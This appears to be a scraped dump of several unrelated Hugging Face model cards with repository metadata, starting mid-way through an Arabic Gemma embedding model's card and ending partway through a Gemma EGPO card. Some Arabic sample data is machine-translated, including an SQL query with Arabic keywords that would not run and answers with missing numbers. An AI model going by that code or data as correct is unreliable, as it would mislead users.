الارتفاع الإجمالي = 50 مترًا + 46.63 مترًا ≈ 96.63 مترًاالآن يمكننا استخدام دالة
الظل لإيجاد زاوية الميل x:tan(x) = الارتفاع الإجمالي / المسافة إلى أسفل التل
ظا(س) = 96.63 متر / 100 مترس = أركانتان (96.63 / 100)
س ≈ 44.08°وبالتالي، فإن زاوية الميل من أعلى سارية العلم إلى أسفل التل تبلغ حوالي
44.08 درجة.'
- ' ما المقصود بالسؤال باله مع التمثيل ؟ توحيد الثانى متوسط الفصل الثانى الإجابة
المقصود بالسؤال باله تعالى هو أن يطلب الشخص من أحد شيئا ما متوسلا باله ، و التمثيل
على ذلك ، مثل أسألك باله أن تساعدنى فى كذا ، أنشد باله أن تخبرنى عن كذا أو باله
عليك أن تعطينى كذا '
- source_sentence: 'هل يوجد موقف سيارات داخل الموقع في هوتل ستراوس؟ '
sentences:
- 'سؤال. مانيكس هو سائق حافلة سياحية. عليه أن يقود مسافة 55 ميلاً إلى الوجهة ثم
يعود إلى نقطة البداية بطريقة مختلفة تبعد 10 أميال. إذا كان بإمكانه القيادة لمسافة
ميل واحد لمدة دقيقتين والبقاء لمدة ساعتين في الوجهة، فكم من الوقت سيستغرق سائق
الحافلة للقيام بالجولة بأكملها في ساعات؟
إجابة. 6
ما هو المنطق خطوة بخطوة الذي يبرر هذه الإجابة؟'
- 'أجل، تُتاح خدمة صف السيارة بمعرفة النزيل مجانًا '
- أحد أكثر الخيارات شيوعاً اليوم هو ركوب سيارة أجرة أو خدمة نقل الركاب مباشرة من
سان فرانسكو إلى الفندق غالباً ما يكون هذا الخيار مجدياً من حيث التكلفة ، ولكن
يجب على الضيوف مراقبة معدلات أوقات الذروة
- source_sentence: هل يمكنك تقديم مثال لاستعلام MySQL الذي يسترد أول 10 سجلات من جدول،
مرتبة بترتيب تنازلي بناءً على خاصية معينة؟
sentences:
- شروط اتباع هذا الرجيم هي الاستمرار عليه لمدة لا تقل عن أيام، ولا يجب الاستمرار
عليه لأكثر من أيام لتجنب أي مخاطر صحية، كما يجب استشارة الطبيب قبل اتباعه لتأكد
من مدى أمانه
- نعم زيت السمسم يعمل على تطويل وتقويه الرموش لاحتوائه على المعادن والفيتامينات
- 'بالتأكيد! يمكنك استخدام استعلام MySQL التالي لتحقيق ذلك:``` SQL
اختر * من الجدول
اطلب حسب خاصية DESC
الحد 10؛
```في هذا الاستعلام، استبدل `الجدول` باسم الجدول الخاص بك، و`الخاصية` بالعمود
الذي تريد الفرز حسبه. يتم استخدام الكلمة الأساسية `DESC` لفرز السجلات بترتيب تنازلي.تسترد
عبارة `SELECT *` كافة أعمدة السجلات المحددة من الجدول. إذا كنت تريد أعمدة محددة
فقط، فيمكنك استبدال `*` بأسماء الأعمدة مفصولة بفواصل.تحدد عبارة `ORDER BY` العمود
المطلوب الفرز حسبه (`الخاصية` في هذه الحالة) وترتيب الفرز (`DESC` للتنازل).وأخيرًا،
تحدد عبارة LIMIT 10 النتيجة بالسجلات العشرة الأولى التي يتم إرجاعها بواسطة الاستعلام.باستخدام
هذا الاستعلام، سوف تتلقى أول 10 سجلات من الجدول، مرتبة بترتيب تنازلي بناءً على
الخاصية المحددة.'
- source_sentence: 'هل يوجد موقف سيارات داخل الموقع في ليفيدورا بينشن؟ '
sentences:
- 'أجل، تُتاح خدمة صف السيارة بمعرفة النزيل مجانًا '
- بع
- 'أجل، تُتاح خدمة صف السيارة بمعرفة النزيل مجانًا '
- source_sentence: أنت مساعد مفيد، تقدم دائمًا الشرح. فكر وكأنك تجيب على طفل عمره
خمس سنوات.
sentences:
- ' السعرات الحرارية في صدر الدجاج منزوع الدسم وغير مطبوخ سعر حراري '
- "أكمل الجملة التالية.شرعت ريبيكا في التجول وتجنيد أعضاء جدد لكنيسة ليندسي\nخيارات:\n\
\ * كانت ريبيكا شابة ونشطة.\n * كانت ليندسي شابة ونشطة."
- 'سأطرح عليك سؤالاً، يرجى الإجابة عليه من خلال عملية تفكير خطوة بخطوة. ماذا يمكن
أن يفعل الشخص المسافر إلى الخارج؟
خيارات:
- يصرخ على
- أشعر بالسعادة
- الشارع العرضي
- متن السفينة
- الحصول على جواز السفر'
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on google/embeddinggemma-300m
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [google/embeddinggemma-300m](https://huggingface.co/google/embeddinggemma-300m). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [google/embeddinggemma-300m](https://huggingface.co/google/embeddinggemma-300m) <!-- at revision c5cfa06e5e282a820e85d57f7fb053207494f41d -->
- **Maximum Sequence Length:** 2048 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
<!-- - **Training Dataset:** Unknown -->
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 2048, 'do_lower_case': False, 'architecture': 'Gemma3TextModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
(2): Dense({'in_features': 768, 'out_features': 3072, 'bias': False, 'activation_function': 'torch.nn.modules.linear.Identity'})
(3): Dense({'in_features': 3072, 'out_features': 768, 'bias': False, 'activation_function': 'torch.nn.modules.linear.Identity'})
(4): Normalize()
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("yasserrmd/arabic-gemma-300m-emb")
# Run inference
queries = [
"\u0623\u0646\u062a \u0645\u0633\u0627\u0639\u062f \u0645\u0641\u064a\u062f\u060c \u062a\u0642\u062f\u0645 \u062f\u0627\u0626\u0645\u064b\u0627 \u0627\u0644\u0634\u0631\u062d. \u0641\u0643\u0631 \u0648\u0643\u0623\u0646\u0643 \u062a\u062c\u064a\u0628 \u0639\u0644\u0649 \u0637\u0641\u0644 \u0639\u0645\u0631\u0647 \u062e\u0645\u0633 \u0633\u0646\u0648\u0627\u062a.",
]
documents = [
'أكمل الجملة التالية.شرعت ريبيكا في التجول وتجنيد أعضاء جدد لكنيسة ليندسي\nخيارات:\n * كانت ريبيكا شابة ونشطة.\n * كانت ليندسي شابة ونشطة.',
'سأطرح عليك سؤالاً، يرجى الإجابة عليه من خلال عملية تفكير خطوة بخطوة. ماذا يمكن أن يفعل الشخص المسافر إلى الخارج؟\nخيارات:\n- يصرخ على\n- أشعر بالسعادة\n- الشارع العرضي\n- متن السفينة\n- الحصول على جواز السفر',
' السعرات الحرارية في صدر الدجاج منزوع الدسم وغير مطبوخ سعر حراري ',
]
query_embeddings = model.encode_query(queries)
document_embeddings = model.encode_document(documents)
print(query_embeddings.shape, document_embeddings.shape)
# [1, 768] [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(query_embeddings, document_embeddings)
print(similarities)
# tensor([[0.9963, 0.9945, 0.9601]])
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### Unnamed Dataset
* Size: 50,000 training samples
* Columns: <code>sentence_0</code> and <code>sentence_1</code>
* Approximate statistics based on the first 1000 samples:
| | sentence_0 | sentence_1 |
|:--------|:-----------------------------------------------------------------------------------|:------------------------------------------------------------------------------------|
| type | string | string |
| details | <ul><li>min: 5 tokens</li><li>mean: 30.79 tokens</li><li>max: 344 tokens</li></ul> | <ul><li>min: 3 tokens</li><li>mean: 82.22 tokens</li><li>max: 1317 tokens</li></ul> |
* Samples:
| sentence_0 | sentence_1 |
|:--------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>اصعب شعور ان تعلمي بخيانة زوجك ولا تستطيعي المواجه</code> | <code>اهلا بك سيدتي ان زوجك يحبك وانت رأيت ذلك بعينك والفتاة هي التي تلاحق زوجك وليس هو ويقوم بشطب الحديث ربما كي لا يضايقك سيدتي لذا لا تحاولي ان تكبري الامر فزوجك لا يتمادى بل يحبك وبما انه لا يفتح المجال أمامها فلن تستطيع الوصول اليه</code> |
| <code>هل يوجد مسبح في هذا الفندق؟</code> | <code>لا يضم ذا إيليزيوم إسطنبول هوتل آند سبا مسبحاً لنزلاء </code> |
| <code>### أين تجد أفضل أماكن الإقامة في أوبيرشواباخ?<br><br></code> | <code>لدينا أماكن لإقامة في أوبيرشواباخ بأسعار تبدأ من اختر من بين عروضنا التي يبلغ عدها واحصل على تخفيضات تصل إلى ستجد أدناه عد أماكن الإقامة الموجودة لدينا في أوبيرشواباخ والمنطقة المجاورة، مُصنّفةً حسب عد النجوم • من أماكن الإقامة بتصنيف نجوم بأسعار تبدأ من في اليلة • من أماكن الإقامة بتصنيف نجوم بأسعار تبدأ من في اليلة • من أماكن الإقامة بتصنيف نجمتين بأسعار تبدأ من في اليلة </code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"gather_across_devices": false
}
```
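As a minimal sketch of how a loss with these parameters is constructed in Sentence Transformers (illustrative only; the checkpoint used and the trainer wiring are assumptions, not the exact script used for this model):
```python
from sentence_transformers import SentenceTransformer
from sentence_transformers.losses import MultipleNegativesRankingLoss
from sentence_transformers.util import cos_sim

# The published checkpoint is loaded here purely to illustrate the loss setup.
model = SentenceTransformer("yasserrmd/arabic-gemma-300m-emb")

# MultipleNegativesRankingLoss with the parameters listed above:
# in-batch negatives, cosine similarity scaled by 20.
loss = MultipleNegativesRankingLoss(model, scale=20.0, similarity_fct=cos_sim)

# The loss is then passed to a SentenceTransformerTrainer together with a
# dataset of (sentence_0, sentence_1) pairs like the one described above, e.g.:
# trainer = SentenceTransformerTrainer(model=model, train_dataset=train_dataset, loss=loss)
```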
### Training Hyperparameters
#### Non-Default Hyperparameters
- `per_device_train_batch_size`: 2
- `per_device_eval_batch_size`: 2
- `num_train_epochs`: 1
- `multi_dataset_batch_sampler`: round_robin
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: no
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 2
- `per_device_eval_batch_size`: 2
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 5e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.0
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: False
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: batch_sampler
- `multi_dataset_batch_sampler`: round_robin
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss |
|:-----:|:-----:|:-------------:|
| 0.02 | 500 | 0.2418 |
| 0.04 | 1000 | 0.196 |
| 0.06 | 1500 | 0.2175 |
| 0.08 | 2000 | 0.2322 |
| 0.1 | 2500 | 0.5057 |
| 0.12 | 3000 | 0.8355 |
| 0.14 | 3500 | 0.7225 |
| 0.16 | 4000 | 0.8465 |
| 0.18 | 4500 | 0.7221 |
| 0.2 | 5000 | 0.6119 |
| 0.22 | 5500 | 0.5523 |
| 0.24 | 6000 | 0.6402 |
| 0.26 | 6500 | 0.6833 |
| 0.28 | 7000 | 0.4836 |
| 0.3 | 7500 | 0.5627 |
| 0.32 | 8000 | 0.6542 |
| 0.34 | 8500 | 0.5496 |
| 0.36 | 9000 | 0.6457 |
| 0.38 | 9500 | 0.6542 |
| 0.4 | 10000 | 0.4788 |
| 0.42 | 10500 | 0.458 |
| 0.44 | 11000 | 0.447 |
| 0.46 | 11500 | 0.5309 |
| 0.48 | 12000 | 0.4494 |
| 0.5 | 12500 | 0.4572 |
| 0.52 | 13000 | 0.4867 |
### Framework Versions
- Python: 3.12.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.2
- PyTorch: 2.8.0+cu128
- Accelerate: 1.10.1
- Datasets: 4.0.0
- Tokenizers: 0.22.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### MultipleNegativesRankingLoss
```bibtex
@misc{henderson2017efficient,
title={Efficient Natural Language Response Suggestion for Smart Reply},
author={Matthew Henderson and Rami Al-Rfou and Brian Strope and Yun-hsuan Sung and Laszlo Lukacs and Ruiqi Guo and Sanjiv Kumar and Balint Miklos and Ray Kurzweil},
year={2017},
eprint={1705.00652},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
mradermacher/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF
|
mradermacher
| 2025-09-23T12:28:54Z | 26 | 1 |
transformers
|
[
"transformers",
"gguf",
"en",
"base_model:brendanartley/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged",
"base_model:quantized:brendanartley/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-09-22T09:18:25Z |
---
base_model: brendanartley/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged
language:
- en
library_name: transformers
mradermacher:
readme_rev: 1
quantized_by: mradermacher
tags: []
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
<!-- ### quants: x-f16 Q4_K_S Q2_K Q8_0 Q6_K Q3_K_M Q3_K_S Q3_K_L Q4_K_M Q5_K_S Q5_K_M IQ4_XS -->
<!-- ### quants_skip: -->
<!-- ### skip_mmproj: -->
static quants of https://huggingface.co/brendanartley/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged
<!-- provided-files -->
***For a convenient overview and download list, visit our [model page for this model](https://hf.tst.eu/model#Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF).***
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
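As a small illustrative sketch (not part of the original instructions above), a single-file quant from the table below can also be fetched and loaded from Python; the filename matches the Q4_K_S entry, and `llama-cpp-python` is assumed to be installed:
```python
from huggingface_hub import hf_hub_download
from llama_cpp import Llama  # pip install llama-cpp-python

# Download the Q4_K_S quant (~7.2 GB) from this repository.
gguf_path = hf_hub_download(
    repo_id="mradermacher/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF",
    filename="Mistral-Nemo-Instruct-2407-DPO-S1K-Merged.Q4_K_S.gguf",
)

# Load the GGUF file with llama.cpp's Python bindings and run a short completion.
llm = Llama(model_path=gguf_path, n_ctx=4096)
out = llm("Summarize what a GGUF file is in one sentence.", max_tokens=64)
print(out["choices"][0]["text"])
```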
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF/resolve/main/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged.Q2_K.gguf) | Q2_K | 4.9 | |
| [GGUF](https://huggingface.co/mradermacher/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF/resolve/main/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged.Q4_K_S.gguf) | Q4_K_S | 7.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF/resolve/main/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged.Q6_K.gguf) | Q6_K | 10.2 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF/resolve/main/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged.Q8_0.gguf) | Q8_0 | 13.1 | fast, best quality |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
marshallhamzah/EchoPath
|
marshallhamzah
| 2025-09-23T12:25:58Z | 0 | 0 |
diffusers
|
[
"diffusers",
"safetensors",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T12:12:49Z |
---
license: apache-2.0
---
|
ChenWu98/numina_qwen_2.5_0.5b_sft_teachers_no_reasoning_source_split_0_2048_0.25
|
ChenWu98
| 2025-09-23T12:25:37Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:Qwen/Qwen2.5-0.5B",
"base_model:finetune:Qwen/Qwen2.5-0.5B",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T12:24:46Z |
---
base_model: Qwen/Qwen2.5-0.5B
library_name: transformers
model_name: numina_qwen_2.5_0.5b_sft_teachers_no_reasoning_source_split_0_2048_0.25
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for numina_qwen_2.5_0.5b_sft_teachers_no_reasoning_source_split_0_2048_0.25
This model is a fine-tuned version of [Qwen/Qwen2.5-0.5B](https://huggingface.co/Qwen/Qwen2.5-0.5B).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="ChenWu98/numina_qwen_2.5_0.5b_sft_teachers_no_reasoning_source_split_0_2048_0.25", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/chenwu/huggingface/runs/hldn54mn)
This model was trained with SFT.
### Framework versions
- TRL: 0.19.1
- Transformers: 4.51.1
- Pytorch: 2.7.0
- Datasets: 4.0.0
- Tokenizers: 0.21.4
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
chaoyinshe/llava-med-v1.5-mistral-7b-hf
|
chaoyinshe
| 2025-09-23T12:24:15Z | 160 | 1 | null |
[
"safetensors",
"llava",
"medical",
"biology",
"visual-question-answering",
"en",
"base_model:microsoft/llava-med-v1.5-mistral-7b",
"base_model:finetune:microsoft/llava-med-v1.5-mistral-7b",
"license:apache-2.0",
"region:us"
] |
visual-question-answering
| 2025-08-21T09:25:44Z |
---
license: apache-2.0
base_model:
- microsoft/llava-med-v1.5-mistral-7b
new_version: microsoft/llava-med-v1.5-mistral-7b
pipeline_tag: visual-question-answering
language:
- en
tags:
- medical
- biology
---
# llava-med-v1.5-mistral-7b-hf
This repository contains a **drop-in, Hugging Face–compatible** checkpoint converted from
[https://huggingface.co/microsoft/llava-med-v1.5-mistral-7b](https://huggingface.co/microsoft/llava-med-v1.5-mistral-7b).
You can load it with the **exact same code** you use for the original model—no extra conversion steps required.
---
## Quick Start
```python
from transformers import LlavaForConditionalGeneration, AutoProcessor
import torch
model_path = "chaoyinshe/llava-med-v1.5-mistral-7b-hf"
model = LlavaForConditionalGeneration.from_pretrained(
model_path,
torch_dtype=torch.bfloat16,
attn_implementation="flash_attention_2", # requires FA2
device_map="auto" # multi-GPU ready
)
processor = AutoProcessor.from_pretrained(model_path)
# Example inference
from PIL import Image

# Load an input image (placeholder path; replace with your own file)
image = Image.open("chest_xray.png")
messages = [
{
"role": "user",
"content": [
{"type": "image"},
{"type": "text", "text": "What is the main finding in this chest X-ray?"}
]
}
]
prompt = processor.tokenizer.apply_chat_template(
messages, tokenize=False, add_generation_prompt=True
)
inputs = processor(
images=[image], text=prompt, return_tensors="pt"
).to(model.device, torch.bfloat16)
with torch.inference_mode():
out = model.generate(**inputs, max_new_tokens=256)
print(processor.decode(out[0], skip_special_tokens=True))
```
|
fpadovani/cds_replace_word_stanza_verb_51
|
fpadovani
| 2025-09-23T12:22:48Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gpt2",
"text-generation",
"generated_from_trainer",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T11:59:11Z |
---
library_name: transformers
tags:
- generated_from_trainer
model-index:
- name: cds_replace_word_stanza_verb_51
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# cds_replace_word_stanza_verb_51
This model is a fine-tuned version of [](https://huggingface.co/) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 3.3397
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 256
- eval_batch_size: 256
- seed: 51
- optimizer: Use adamw_torch_fused with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 200
- num_epochs: 5
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| No log | 1.0 | 499 | 3.5965 |
| 4.2131 | 2.0 | 998 | 3.4521 |
| 3.2298 | 3.0 | 1497 | 3.3883 |
| 3.0936 | 4.0 | 1996 | 3.3526 |
| 3.0121 | 5.0 | 2495 | 3.3397 |
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu128
- Datasets 4.0.0
- Tokenizers 0.22.0
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64-0922195521-epoch-7
|
vectorzhou
| 2025-09-23T12:21:35Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T11:10:22Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64-0922195521-epoch-7", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/09vdah42)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
